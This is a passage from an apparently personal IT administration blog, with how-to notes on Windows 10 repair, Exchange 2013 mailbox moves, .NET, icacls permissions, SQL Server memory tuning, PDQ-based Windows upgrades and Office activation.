-black screen of death trying to update to WIN-v1607.
-the driver is v9.17.10.4299.
-had to manually untar the cab.
-had to manually update the driver to v9.17.10.4459
-also installed the latest CHIPSET driver for QM67 (intel 6 series).

CASE-2
-INTEL GRAPHICS HD 2000
-black screen of death trying to update to WIN-v1607.
-the driver is v9.17.10.4299.
-had to manually untar the cab.
-had to manually update the driver to v9.17.10.4459
-also installed the latest CHIPSET driver for Q65 (intel 6 series).

CASE-3
-INTEL GMA 4500 (g41 chipset)
-black screen of death trying to update to WIN-v1607.
-the driver is v8.15.10.2702
-make sure KB3176938 is installed.

NOTES:
-use HWINFO to find out details of your computer.
-https://en.wikipedia.org/wiki/List_of_Intel_graphics_processing_units
-https://en.wikipedia.org/wiki/List_of_Intel_chipsets

## Office365 Options

Office365 has many options and it can be confusing on their web site. Here's an easy to read all-in-one page to quickly identify your needs:

 EXCHANGE-1 EXCHANGE-2 OFFICE-365-ESSENTIALS OFFICE-365-BUSINESS OFFICE-365-PREMIUM OFFICE-365-PROPLUS OFFICE-365-E1 OFFICE-365-E3 OFFICE-365-E5 cost-montly $4.00$8.00 $5.00$8.25 $12.50$12.00 $8.00$20.00 $35.00 cost-annual$48.00 $96.00$60.00 $99.00$150.00 $144.00$96.00 $240.00$420.00 exchange YES YES YES NO YES NO YES YES YES mailbox-size 50GB 100GB 50GB 0GB 50GB 0GB UNLIMITED UNLIMITED UNLIMITED apps-online NO NO YES YES YES YES YES YES YES apps-desktop NO NO NO YES YES YES NO YES YES onedrive NO NO YES YES YES YES YES YES YES onedrive-size 0TB 0TB 1TB 1TB 1TB 1TB 1TB 1TB 1TB shared contacts YES YES YES NO YES NO YES YES YES shared calendar YES YES YES NO YES NO YES YES YES maximum users UNLIMITED UNLIMITED 300 300 300 UNLIMITED UNLIMITED UNLIMITED UNLIMITED

NOTES:

## Exchang 2013 Change Primary SMTP Email Address

Exchang 2013 Change Primary SMTP Email Address

You might get the following, "Couldn't update the primary SMTP address because this mailbox is configured to use an e-mail address policy."

Here's how to fix:
Set-Mailbox foo.user -PrimarySmtpAddress This e-mail address is being protected from spambots. You need JavaScript enabled to view it -EmailAddressPolicyEnabled $false Or if you need to set all the addresses for one mailbox all at once (the captial SMTP is the primary smtp address and the lowercase smtp is the additional smtp email addresses): Set-Mailbox foo.user -EmailAddresses smtp:foo.user@domain1, smtp:foo.user@domain2, SMTP:foo.user@domain3 -EmailAddressPolicyEnabled$false

## Grab All The Photos From A Web Site

So you want to grab all the photos from a web site do you? Here's how:

wget -nd -r -A jpg -e robots=off http://wherever.tld

This will put all the photos from the web site you reference (and all lower directories) to a single directory. This will not magically grab photos from a directory which has no page attached to it and has random names.

If you do know the names are sequential numbers then you can try:

wget -nd -r -A jpg -e robots=off http://wherever.tld/gallery/{0..1000}.jpg

## Create a ZIP File in Linux

Create a ZIP file in Linux.

This will create a ZIP file called foo.zip that contains all of the documents in the current directory.

zip foo.zip ./*

## Exchange 2013 Move Mailbox From One Database to Another Database

Here's the command to move a mailbox from one database to another database:

New-MoveRequest foo.user -TargetDatabase "Mailbox XYZ"

Here's how to do a batch based on last name letter:

Get-mailbox -Database "Mailbox-Foo1" -ResultSize Unlimited |get-recipient -RecipientType UserMailbox -Filter {lastname -like 'h*'} |get-mailbox |New-MoveRequest -TargetDatabase "Mailbox-Foo2" -BatchName "Foo-batch"

Here are the diagnostic short list:

get-moverequest
get-moverequeststatistics
remove-moverequest foo.user
(get-moverequest).count

### SPEED TWEAKS ON HOW TO MOVE MAILBOXES FASTER

I have found that moves are slow unless they are set as EMERGENCY. Here's how:

set-MoveRequest foo.user -priority emergency

Also, some have found that turning off the MRS (throttling) improves performance. I haven't tried it. Here's how:

reg query "HKLM\SYSTEM\CurrentControlSet\services\MSExchange ResourceHealth" /v MRS

:: TURN OFF MRS
echo y | reg add   "HKLM\SYSTEM\CurrentControlSet\services\MSExchange ResourceHealth" /v MRS /d 0
:: STOP EXCHANGE REPLICATION SERVICE
sc stop MSExchangeRepl

:: TURN ON MRS
echo y | reg add   "HKLM\SYSTEM\CurrentControlSet\services\MSExchange ResourceHealth" /v MRS /d 1
:: START EXCHANGE REPLICATION SERVICE
sc start MSExchangeRepl

### SEE WHAT'S HAPPENING

Here's how to see how the full list:

Get-moverequest |get-moverequeststatistics |sort-object -Property PercentComplete -descending

Here's how to see how many have finished:

(Get-MoveRequest -movestatus completed).count

Here's how to see how many are in progress:

(Get-MoveRequest -movestatus inprogress).count

Here's how to see how the normal-moves are going:

Get-moverequest -movestatus inprogress |get-moverequeststatistics |sort-object -Property PercentComplete -descending

Here's how to see how the emergency-moves are going:

Get-moverequest -movestatus inprogress -flags highpriority |get-moverequeststatistics |sort-object -Property PercentComplete -descending

### WHAT TO DO WITH "FAILED" MOVES

If move requests fail, you can see why. Here's how:

get-moverequeststatistics -includereport foo.user |fl

Usually a single bad item. You can set the move to raise the badlimit just a little and restart the move with the following:

get-moverequest foo.user |set-moverequest –baditemlimit 10 -priority emergency
resume-moverequest foo.user

## EXCHANGE 2013 Mailflow Stop After Update is Cancelled

Cancel EXCHANGE update (CU13) because it requires a HOTFIX (or two) before it continues. Afterwards, OUTLOOKs are disconnected; OUTLOOK-WEB-ACCESS works; sending & receiving email doesn't work. Hmmmm.... what to do.

Checking the WINDOWS logs and I see:

"Failed to discover Ews Url for mailbox"

Then I check for the EXCHANGE COMPONENT STATUS:

• Get-ServerComponentState –Identity ServerNameHere

This will tell you the state of the server components in an ACTIVE/INACTIVE way. If something is INACTIVE, you can turn it to ACTIVE by:

• Get-ServerComponentState –Identity ServerNameHere -Component ServerWideOffline -State Active -Requester Functional
• sc stop MSExchangeTransport
• sc stop MSExchangeFrontEndTransport
• timeout 80
• sc start MSExchangeTransport
• sc start MSExchangeFrontEndTransport

It should turn back to ACTIVE. However, if there was a second REQUESTER making the change to INACTIVE, this REQUESTER must also set to ACTIVE for the whole status to be ACTIVE:

• Get-ServerComponentState –Identity ServerNameHere -Component ServerWideOffline -State Active -Requester Maintenance
• sc stop MSExchangeTransport
• sc stop MSExchangeFrontEndTransport
• timeout 80
• sc start MSExchangeTransport
• sc start MSExchangeFrontEndTransport

Another way to fix this is to install the HOTFIXES that are needed and then proceed with the EXCHANGE update. Wait about an hour or so and viola! Working server automatically. Apparently, the EXCHANGE update automatically turns off some of the components. If the update is canceled, these components are left in the INACTIVE state. Going through the update process turns the components to the ACTIVE state automatically.

NOTES:
-https://blogs.technet.microsoft.com/exchange/2013/09/26/server-component-states-in-exchange-2013/
-google: "Failed to discover Ews Url for mailbox"
-to test mail flow use: Test-Mailflow -TargetEmailAddress This e-mail address is being protected from spambots. You need JavaScript enabled to view it

## How to Enable DOTNET 3.5 on Windows 10

### BACKGROUND

DOTNET is a computer language. If it is installed on you, you can speak it and understand it.

DOTNET is to MICROSOFT what JAVA is to SUN/ORACLE.

There are certain versions of DOTNET that automatically come with certain versions of WINDOWS. They are as follows:

 DOTNET VERSION DATE WINDOWS VERSION 1.0.0 02/13/02 XP 1.1.0 04/24/03 N/A 2.0.0 11/07/05 N/A 3.0.0 11/06/06 Vista 3.5.0 11/19/07 7 4.0.0 04/12/10 N/A 4.5.0 (378389) 08/15/12 8 4.5.1 (378675/378758) 10/17/13 8.1 4.5.2 (379893) 05/05/14 N/A 4.6.0 (393295) 07/20/15 10 4.6.1 (394254) 11/30/15 10 v1511 (November Update) 4.6.2 (394802) 08/02/16 10 v1607 (Anniversary Update) 4.7.0 (460798) 04/11/17 10 v1703 (Creators Update) 4.7.1 (461308) 10/17/17 10 v1709 (Fall Creators Update) 4.7.2 (461808) 04/10/18 10 v1803 (April 2018 Update)

DOTNET can be installed in parallel with other versions. For example, v3.5 can be installed with v4.0.

Certain versions of DOTNET are required for certain software to run. If something is built to run off of v3.5, this doesn't mean it will work with v4.6.2.

Starting with WINDOWS 10, DOTNET v4.6.0 is included.

DOTNET v3.5 (including v2 & v1) is included in WINDOWS 10 as a "feature" but it is not installed/enabled.

### TO SEE IF DOTNET 3.5 (v2 & v1) IS INSTALLED ON WINDOWS 10

• -click START > RUN
• -type: cmd
• -type: DISM /Online /get-features /Format:Table

This will list out all the features of WINDOWS 10 and their status.

You are looking for NETFX3. This is DOTNET v3.2 (v2 & v1).

### ENABLE DOTNET v3.5 (v2 &v1)

If it is not enabled, you will need to enable it.

• -click START > RUN
• -type: cmd
• -type: DISM /Online /Enable-Feature /FeatureName:NetFx3 /All

Or for an OFFLINE installation where you have the source CD/DVD/USB/WIM/SHARE:

• DISM /Online /Enable-Feature /FeatureName:NetFx3 /All /LimitAccess /Source:c:\path\to\Windows10x64\sources\sxs
• DISM /Online /Enable-Feature /FeatureName:NetFx3 /All /LimitAccess /Source:\\server\share\os\Win10x64\untar\sources\sxs

### FIND DOTNET VERISION

To find the DOTNET version:

• -type: Get-ChildItem "hklm:SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\"
or
• -type: reg query "hklm\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\full" /v Release
This will give the value in HEX. You have to convert the HEX number to DEC.

This will give a RELEASE value that corrosponds to a VERSION number. See the chart above.

## WINDOWS PERMISSIONS WITH ICACLS

WINDOWS permissions with icacls.

When permissions in WINDOWS is FUBAR'd, start from scratch by resetting the permissions as they would be if nothing has changed.

RESET PERMS FOR DIR RECURSIVELY
icacls folder-name-here /t /reset

Now, from this point if you would like to add a USERNAME or GROUPNAME:

ADD FULL PERMS FOR DIR RECURSIVELY
(doesn't change existing)

If you want to set permissions explicitly as you tell it to:

REMOVE INHERITANCE | GRANT USERNAME | (CI) ENSURES NEW ITEMS WILL HAVE THESE PERMS
(changes everything from scratch)
icacls foo-folder /inheritance:r /grant username:(ci)f /t

EXAMPLE
(This is probably what you want. The SYSTEM, OWNER, ADMINISTRATORS all have FULL CONTROL. The USERNAME has READ-ONLY-CONTROL).

BONUS:
If you need to take ownership beforehand, you can do so by the following:
takeown /f top-folder-name /r /d y

or:
takeown /f "c:\foo folder" /r /d y

## How To Find .Net Version Installed | How To Find the Powershell Version Installed

Find .Net Version installed on your computer or to find the Powershell version installed on your computer:

• -open POWERSHELL
• -type: $PSVersionTable The CLRVersion is the .NET version in "version name." If you want to know what it is in "product name" type it into google. The PSVersion is the Powershell version installed. ## How to Checksum Files in Windows 10 How to Checksum Files in Windows 10. There are a few ways to CheckSum files in Windows 10 listed in the great wide open of the internet. They are as follows: fciv (outdated from 2004) fciv -md5 d:\programs\setup.exe certutil (built into Windows) CertUtil -hashfile C:\TEMP\MyDataFile.img MD5 get-filehash (built into PowerShell v4 and higher) get-filehash -algorithm md5 <file_to_check> other tools There are other tools out there but I prefer to stick with what's built into the OS and released/blessed from the OS author. ## Access RAPIDSSL Certificates ## Access RAPIDSSL Certificates To access your RAPIDSSL certificates or your GEOTRUST certificates, you can login to their END USER PORTAL here: This is kinda hidden since typically RAPIDSSL only sells to resellers and pushes all support through them, so I'm making a note of it. ## SQL Server 2014 High CPU After Installing SP2 SQL Server 2014 High CPU After Installing SP2. There are 3 steps I used to fix this: STEP 1: find the username of the SQL • -open "SQL Server 2014 Configuration Manager." • -right-click on the instance of SQL that you are running. • -click PROPERTIES (a box opens). • -click LOG-ON tab (at the top). • -take note of the USERNAME that is running. • -click OK • -exit out of "SQL Server 2014 Configuration Manager." STEP 2: add the username to the LOCK PAGES IN MEMORY section • -click START > RUN • -type: gpedit.msc • -click COMPUTER-CONFIGURATION > WINDOWS-SETTINGS > SECURITY-SETTINGS > LOCAL-POLICIES > USER-RIGHTS-ASSIGNMENT • -find LOCK-PAGES-IN-MEMORY • -click ADD-USER-OR-GROUP • -type in the USERNAME from above. STEP 3: adjust the MAX MEMORY • -open the 2014 MANAGEMENT STUDIO • -login to the SQL DATABASE you are running. • -right-click the SQL DATABASE name (at the top, on the left-hand side) • -click PROPERTIES • -click MEMORY (on the left hand side). • -you will see the MINIMUM SERVER MEMORY and the MAXIMUM SERVER MEMORY areas. • -leave the MINIMUM SERVER MEMORY at 0 (zero). • -find the MAXIMUM SERVER MEMORY box. • -type in the number for your server. This number is based on the amount of RAM in your system. • -the chart is here: https://www.brentozar.com/blitz/max-memory/ • -click OK. That's it!!! You did it!!! ## Windows 10 Product Key slmgr /ipk xxxxx-xxxxx-xxxxx-xxxxx-xxxxx Of course, replace your product key here. This didn't work for me for some reason. I had to go traditional gui route and that worked. Same product key. ## WOL Control Waking remote computers with WOL. As usual, the options are dizzying. Here's a cheat sheet. See what's capable: powercfg -devicequery wake_from_any But this list is too long. Since not all devices can be config'd, some devices are going to wake whether the user wants them to or not. So to see what's capable of being user config'd (what can be changed): powercfg -devicequery wake_programmable See what's enabled: powercfg -devicequery wake_armed And finally, to enable a device to be a waking point: POWERCFG -deviceenablewake "exact device name here" A quick batch script would be: POWERCFG -devicequery wake_from_any | FINDSTR /i "net" > c:\foo\adapters.txt FOR /F "tokens=*" %%i IN (c:\foo\adapters.txt) DO POWERCFG -deviceenablewake "%%i"  ## Manage Printers via Command Line Manage printers via command line: • Get the default printer details from command line: cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs -g • Get the list of printers added to the system from Windows command line: cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs -l • Set default printer from windows command line: cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs -t -p "\Servername\printername" ## Install Windows 10 In-Place Upgrade on All Computers in a Domain With PDQ Deploy Install Windows 10 In-place upgrade on a domain is possible in a couple of ways. The official way is to use the MICROSOFT DEPOLYMENT TOOLKIT found here: https://technet.microsoft.com/en-us/windows/dn475741.aspx The other way is through simple network share. Wait... what? Yes, network share. STEP 1: get WINDOWS 10 ISO at https://www.microsoft.com/en-us/software-download/windows10ISO • -you will see 4 options WINDOWS 10 (all languages) WINDOWS 10 K (Korean law) WINDOWS 10 N (European law) WINDOWS 10 SINGLE LANGUAGE (1 language only) • -simply download the one you need. The one that matches what you have now which is probably WINDOWS 10 ALL LANGUAGES. • -again, since you are doing an IN-PLACE UPGRADE, the ISO must match what's on your system now. Many of the issues people are having is that they are trying to upgrade their system with a WINDOWS 10 PRO SINGLE LANGUAGE when they have WINDOWS 7 ALL LANGUAGES installed on their machine. • NOTE: do NOT use the MEDIA-CREATION-TOOL for this exercise. STEP 2: mount WINDOWS 10 ISO This means show the files that are in the ISO. Windows 7 cannot do this without some help such as WINRAR, 7ZIP or VIRTUAL-CLONEDRIVE. WINDOWS SERVER 2012, WINDOWS 8.1 and newer can do this without additional software. This can happen either through the GUI or through POWERSHELL command MOUNT-DISKIMAGE. There is no correct way on how you mount the ISO, just do it. STEP 3: create the network share Create the share: • md C:\installs\os\win10x64\unpack And share it so everyone can read it (outside the scope of this article post). STEP 4: copy the ISO contents onto a created network share. I use ROBOCOPY to do this. It is built into WINDOWS 7 and newer. Something like: • robocopy /e f:\ C:\installs\os\win10x64\unpack STEP 5: Build your install package Pretty easy when you know what to do it right. • -select the setup.exe on the network share. Something like: \\myserver\installs\os\win10x64\unpack\setup.exe • -type in the parameters: /auto upgrade /Compat IgnoreWarning /installfrom c:\Windows\AdminArsenal\PDQDeployRunner\service-1\exec\sources\install.wim /dynamicupdate disable /showoobe none /quiet NOTE: if you would like, you can save the log files as well. Add the following to the end of the parameters above: /copylogs \\myserver\installs\os\win10x64\logs • -checkmark "Include Entire Directory" • click PACKAGE PROPERTIES • make sure the COPY MODE is changed to PULL (not PUSH). • checkmark "use custom timeout" and change the number to 240. • save the package. STEP 6: deploy on test victim. That should do it!!! If the test pc works, deploy to the rest of the pc's how you see fit. ============================================================== If for some reason the above PDQ package fails, you can create a .bat file and fill it with following (adjust as necessary): :: MAKE DIRECTORY. md c:\installs\Windows10x64 :: COPY FILES. robocopy /MIR \\myserver\installs\os\win10x64\unpack\ c:\installs\Windows10x64 :: CHANGE DIRECTORY. cd c:\installs\Windows10x64 :: START THE IN-PLACE UPGRADE (OR CLEAN INSTALL). start /wait setup.exe /auto upgrade /Compat IgnoreWarning /installfrom c:\installs\Windows10x64\sources\install.wim /dynamicupdate disable /showoobe none /quiet • Save this .bat in \\myserver\installs\os\win10x64\unpack\ • Then create a PDQ package with this bat. • Deploy as you see fit. ## Office 2010 "You don't have permission to open this file." ## Office 2010 "You don't have permission to open this file." You also might get, "filename.xls could not be found." -disable Panda's DATA SHIELD. Panda's Cloud free antivirus has a new component called Data Shied. Disable the DATA SHIELD and it will fix the issue. ## Automatically Install Office 2016 to Domain Network • -download ISO. • -mount ISO. • -copy contents to network share. • -run setup.exe /admin • -config (product key, org name, etc). • -click FILE SAVE. • -save the MSP file at the network share. • -follow the rest. This will automatically deploy OFFICE 2016 to domain PC's of your choosing. And it's completely silent. This process is how network administration should be done! Not "proof of concept" stuff along with long winded instruction sets. ## HDMI Cable Speeds 2160/60p, 4:2:0, 8-bit, 8.91Gbps 2160/60p, 4:2:0, 10-bit, 11.14Gbps 2160/60p, 4:2:0, 12-bit, 13.37Gbps 2160/60p, 4:2:0, 16-bit, 17.82Gbps 2160/60p, 4:2:2, 8-, 10- or 12-bit, 17.82Gbps 2160/60p, 4:4:4, 8-bit, 17.82Gbps 4320/60p, 4:4:4, 12-bit, ~72Gbps HDMI CERTIFICATE TYPES Standard (or "category 1"), no Ethernet; High Speed (or "category 2"), no Ethernet; Standard, with Ethernet; High Speed, with Ethernet; Premium, no Ethernet; Premium, with Ethernet. Full Disclosure: I have an AudioQuest cable. Picked it up at a conference as a freebie ;-) ## ErrorCode: 1603(0x643) | Office 2010 Won't Install on Windows 10 | CAInitSPPTokenStore.x86: Error: Failed to initialize the SPP Token store. HResult: 0x80070057 WINDOWS 10 is having trouble installing software. This is a complex issue but basically some software won't install (or updates won't install) because of an ERROR 1603. More specifically: ErrorCode: 1603(0x643). Turning on VERBOSE logging (check another article but it puts the logs in %user%\appdata\local\temp) for the install, it shows that the actual error is: CAInitSPPTokenStore.x86: Error: Failed to initialize the SPP Token store. HResult: 0x80070057. Hmmm... What to do? • -click START > RUN > REGEDIT • -navigate to: hkey_local_machine/software/microsoft/windows nt/currentversion/profilelist Nested underneath, you will see SID's. Somthing like: • s-1-5-18 • s-1-5-19 • s-1-5-20 • s-1-5-21-...1000 • s-1-5-21-...1003 • s-1-5-82 To see what SID's corrospond to actual accounts. • -type: wmic useraccount get name,sid You'll see something like: • 1000 owner • 1003 tempfix Notice that s-1-5-18, s-1-5-19, s-1-5-20 do not show. So what's up? Well, this is because these are system-accounts that are not be used/seen. This is what we are concerned about. They are as follows: • s-1-5-18 is SYSTEM • s-1-5-19 is LOCAL SERVICE • s-1-5-20 is NETWORK SERVICE Next, go back to regedit to: hkey_users A DEFAULT NORMAL INSTALL has something like: • S-1-5-18 • s-1-5-19 • s-1-5-20 • s-1-5-21-...1215 • s-1-5-21-...1216 • s-1-5-21-...1217 What we are seeing is that some of the upgrades to WINDOWS 10 are BROKEN and has the following: • s-1-5-18 • s-1-5-19 • s-1-5-21-...1000 • s-1-5-21-...1003 So, it is missing s-1-5-20. Here's how to fix: • -start > all-programs> accessories • -right click COMMAND-PROMPT > run-as-administrator • -type ren C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT *.OLD • -xcopy /h "C:\Users\Default\NTUSER.DAT" "C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT" • -in explorer travel to C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT • -right-click > properties > security > edit > add • -type: NETWORK SERVICE • -give NETWORK SERVICE full-control • -reboot Now, upon reboot, open REGEDIT again and go to HKEY_USERS. You should now see that s-1-5-20 is added back in. Let's add the correct permissions: • -right-click on S-1-5-20 • -click permissions > add • -type: network service • -click OK • -checkmark FULL CONTROL • -click OK I do not have a good explanation of why this happens. It could be a corrupt file. It could be a failed upgrade. It could be some type of antivirus. I do not know. What I know is that this took a few days to figure out and the software will now install successfully!!!! ## Download Office 2010 Download Office 2010. Let's say that you have an OFFICE 2010 install that doesn't work. You cannot uninstall it either. Nor do you have a CD/USB/SOURCE to install because it was on your computer when you bought it and you just used a PRODUCT KEY. What do you do? NOTE: !!!Make sure you have your PRODUCT KEY!!! You can get this with BELARC-ADVISOR (among many others). 1 - UNINSTALL OFFICE You can uninstall office by using the automatic uninstall tool here: 2013 | 2016 http://support.microsoft.com/kb/2739501 2 - DOWNLOAD OFFICE Yes, you need a PRODUCT KEY/INSTALL KEY. So if you were looking to download for free, this isn't that kind of place. You can download office here: https://www.microsoft.com/en-us/software-download/office 3 - EXTRACT OFFICE • -run COMMAND PROMPT (as administrator) • -office_hs_2010_english_x32.exe /extract:c:\office2010 4 - INSTALL OFFICE • -right-click on setup.exe • -run as administrator ## [Solved] Your PC Ran Into A Problem And Needs To Restart Windows 10 Loop "Your PC Ran Into A Problem And Needs To Restart" Windows 10 Loop! or "Your PC did not start correctly" Collectively, let's all say "Arrrrrrrrrrrrrrrrgh!!!" This is the stuff that I really dread for the average person. How in the world is a normal person supposed to be able to get through an issue like this? There are 10 possible reasons for this loop and possibly more that need repairing: • 1-startup repair • 2-checkdisk • 3-system restore • 4-safe boot / low res • 5-sfc • 6-windowsapps folder • 7-registry repair • 8-boot repair • 9-dism • 10-reload and transfer ISSUE 1 - There is a startup problem (startup repair). • -click ADVANCED OPTIONS. • -click TROUBLESHOOT. • -click ADVANCED OPTIONS. • -click STARTUP REPAIR. • -let it go through its process and restart. ISSUE 2 - There is a filesystem problem (checkdisk). • -click ADVANCED OPTIONS. • -click TROUBLESHOOT. • -click ADVANCED OPTIONS. • -click COMMAND PROMPT • -type: chkdsk d: /f /r • (note depending on what your OS drive letter is, this could be: chkdsk c: /f /r) • -let it go through its process and restart. ISSUE 3 - System Restore • -click ADVANCED OPTIONS. • -click TROUBLESHOOT. • -click ADVANCED OPTIONS. • -click SYSTEM RESTORE. • this will go through a process of showing previous time in the past. You can choose one of these points. Your system-files will go back to that time, removing any updates, patches or changes. Your document-files will remain as they are now. • -let it go through its process and restart. ISSUE 4 - safe-mode or low-resolution-video • -click ADVANCED OPTIONS. • -click TROUBLESHOOT. • -click ADVANCED OPTIONS. • -click STARTUP-SETTINGS • -the computer will reboot and give the options to press F1 through F9 • -press F3 to try low-resolution video as sometimes Windows 10 suddenly doesn't like the video drivers. • -or press F5 to try to get to safe-mode-with-networking. ISSUE 5 - sfc • -click ADVANCED OPTIONS. • -click TROUBLESHOOT. • -click ADVANCED OPTIONS. • -click COMMAND PROMPT • -type: sfc /scannow • -let it go through its process and restart. ISSUE 6 - windowsapps folder For some reason the "windowsapps" folder gets messed up during an update or during system-restore (message about "appxstaging"): • -click ADVANCED OPTIONS. • -click TROUBLESHOOT. • -click ADVANCED OPTIONS. • -click COMMAND PROMPT • -type: takeown /f "C:\Program Files\WindowsApps" /r /d Y • -type: icacls "C:\Program Files\WindowsApps" /grant administrator:F /t • -type: rd /s "C:\Program Files\WindowsApps" • -reboot and see if that works. ISSUE 7 - There is a registry error. • -click ADVANCED OPTIONS. • -click TROUBLESHOOT. • -click ADVANCED OPTIONS. • -click COMMAND PROMPT • -type: d: • -hit enter • -type: cd windows • -hit enter • -type: cd system32 • -hit enter • -type: cd config • -hit enter • -type: ren default default1 • -hit enter • -type: ren sam sam1 • -hit enter • -type: ren software software1 • -hit enter • -type: ren security security1 • -hit enter • -type: ren system system1 • -hit enter • -type: cd regback • -hit enter • -type: copy * ..\ • (that is: copy-space-asterisk-space-dot-dot-backslash) • -hit enter • -type: exit • -let it reboot and see if that works. ISSUE 8 - There is a boot problem. • -click ADVANCED OPTIONS. • -click TROUBLESHOOT. • -click ADVANCED OPTIONS. • -click COMMAND PROMPT • -type:bootrec.exe /fixmbr • -type: bootrec.exe /fixboot • -type: bootrec.exe /RebuildBcd • -type: exit • -let it reboot and see if that works. ISSUE 9 - dism This is the only issue that I have not tried personally as I've never had to get this far. The idea is that there is something wrong with Windows and that it can be repaired: • -click ADVANCED OPTIONS. • -click TROUBLESHOOT. • -click ADVANCED OPTIONS. • -click COMMAND PROMPT • -type: dism /online /cleanup-image /scanhealth • -type: dism /online /cleanup-image /restorehealth • -let it go through its process and restart. ISSUE 10 - reload and transfer If I've gone through the 9 issues above without success, I throw in the towel and reload Windows 10 on a new hard drive (ssd) and transfer the data. Not ideal but usually by this point, reloading and transferring data is going to be faster than further troubleshooting. Those are the 10 issues that I go through when I get, "Your PC Ran Into A Problem And Needs To Restart" Windows 10 Loop. ## 1-3-2 Bios Beeps Dell Precision T3500 Dell Precision T3500 boots fine. Upon, reboot the system bios beeps: 1-3-2. In other words, beep (pause) beep-beep-beep (pause) beep-beep. Nothing. No bios. Just black screen. The only way to get it to reboot properly without the bios beeps is to yank the power from the computer. Wait till the electricity discharges from the motherboard by holding in the power button. Plug the system back into the power. Press the power button. But here's how to fix: • -upgrade the bios. • -reset to defaults. • -turn off the FAST BOOT. • -disable the DISKETTE DRIVE. • -uncheck the ONBOARD OR USB FLOPPY DRIVE. • -uncheck the ONBOARD OR USB CD DRIVE. While we are at it, change the silly default options: • -disable LOW-POWER-MODE. • -enable HYPER-THREADING (if you have it). • -enable MULTICORE. • -enable TURBOBOOST. • -disable SPEEDSTEP. • -enable SMART TEST. There could be other reasons. For me, this was what worked. The key seemed to be something in the FASTBOOT and the DISKETTE DRIVE. NOTES: • -this was a 6 month process :-( • -replacing the 525W power supply with a 850W power supply didn't work. ## WINDOWS 10 Falls Asleep After 2 Minutes MANUAL EDIT: 01 -click START > RUN > CMD (or POWERSHELL) (as administrator) 02 -type: echo y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\238C9FA8-0AAD-41ED-83F4-97BE242C8F20\7bc4a2f9-d8fc-4469-b07b-33eb785aaca0" /v Attributes /d 2 03 -enter 04 -type: echo y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Power\PowerSettings\2a737441-1930-4402-8d77-b2bebba308a3\d4e98f31-5ffe-4ce1-be31-1b38b384c009" /v Attributes /d 2 05 -enter 06 -click START > CONTROL-PANEL > POWER-OPTIONS > CHANGE-THE-PLAN-SETTINGS > click on the "Change advanced power settings". 07 -click on the "Change settings that are currently unavailable" 08 -click Sleep > System unattended sleep timeout > type 0 09 -click USB-SETTINGS > USB-3-LINK-POWER-MANAGEMENT > set to OFF 10 -click OK 11 That's it!!! You did it!!! ## OFFICE 2013 ACTIVATION I'm not an expert on ACTIVATION as LICENSING is a pain. Luckily, I'm in a corporate situation where budgets are secondary to getting it working. KMS & MAK are not covered here. Here's how: • -click START > RUN • -type: cmd • -type: cd C:\Program Files\Microsoft Office\Office15 From here, there are 3 basic commands to help and resolve: STATUS, CHANGE, ACTIVATE. GET STATUS • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /dstatus CHANGE KEY • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /inpkey:XXXXX-XXXXX-XXXXX-XXXXX-XXXXX ACTIVATE KEY • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /act The result will look something like this: RESULT Microsoft (R) Windows Script Host Version 5.812 Copyright (C) Microsoft Corporation. All rights reserved. ---Processing-------------------------- --------------------------------------- SKU ID: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX LICENSE NAME: Office 15, OfficeStandardVL_MAK edition LICENSE DESCRIPTION: Office 15, RETAIL(MAK) channel LICENSE STATUS: ---LICENSED--- Last 5 characters of installed product key: XXXXX --------------------------------------- --------------------------------------- ---Exiting----------------------------- Sometimes, there is a double install where 2 different versions are installed at the same time. A KMS version and a MAK version. You can find out by SEE ALL KEYS THAT ARE TRYING TO ACTIVATE • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /dstatus UNINSTALL KEY THAT ISN'T CORRECT • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /unpkey:last-5-digits THEN IMMEDIATELY INSTALL AN MAK KEY • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /inpkey:XXXXX-XXXXX-XXXXX-XXXXX-XXXXX THEN ACTIVATE • C:\Program Files\Microsoft Office\Office15>cscript ospp.vbs /act ## Windows 10 ISO To be clear, you can do a CLEAN INSTALL of WINDOWS 10 if you have WINDOWS 7 or WINDOWS 8 or WINDOWS 8.1 until the end of JULY 2016. To do so, you need a WINDOWS 10 USB. This is easily obtained by using the WINDOWS 10 MEDIA CREATION TOOL (MCT) here: http://go.microsoft.com/fwlink/?LinkId=691209 Now you have a bootable USB disk. But what if you want to create a multiple boot USB disk where WINDOWS 10 is just one of the options? You would somehow have to create a WINDOWS 10 ISO. I enjoy the E2B project. Despite being wordy and looking complicated, it's actually fairly simple. Here's the shortcut. • -download the E2B project here: (http://www.easy2boot.com) • -unzip the download. • -click MAKE_E2B_USB_DRIVE (run as admin) (CAUTION!!! This will delete everything on the USB drive.) • -install your ISO/IMG/IMGPTN in the appropriate place. Now to the part where we need a WINDOWS ISO. To be fair, you can get a WINDOWS 10 ISO in 2 ways. ### FIRST WAY TO GET WINDOWS 10 ISO • Download the ISO from the link using GOOGLE-CHROME'S ANDROID VIEW: • -open CHROME • -click SETTINGS (at the upper right) > MORE-TOOLS > DEVELOPER-TOOLS • -a window open on the right hand side. • -click the TOGGLE-DEVICE-TOOLBAR icon (at the top of the right hand side). • (It is the second one from the left.) • -then visit the following page: https://www.microsoft.com/en-us/software-download/windows10ISO • -you will see 4 options WINDOWS 10 (all languages) WINDOWS 10 K (Korean law) WINDOWS 10 N (European law) WINDOWS 10 SINGLE LANGUAGE (1 language only) • -simply download the one you want (probably WINDOWS 10 ALL LANGUAGES) For me, doing this somehow downloaded the iso as a WINDOWS 10 HOME version. It doesn't matter, it will still install WINDOWS 10 PRO. But I would like the INSTALL.EDB to say WINDOWS 10 PRO. I do not know yet if it matters. NOTE: If you are doing an IN-PLACE 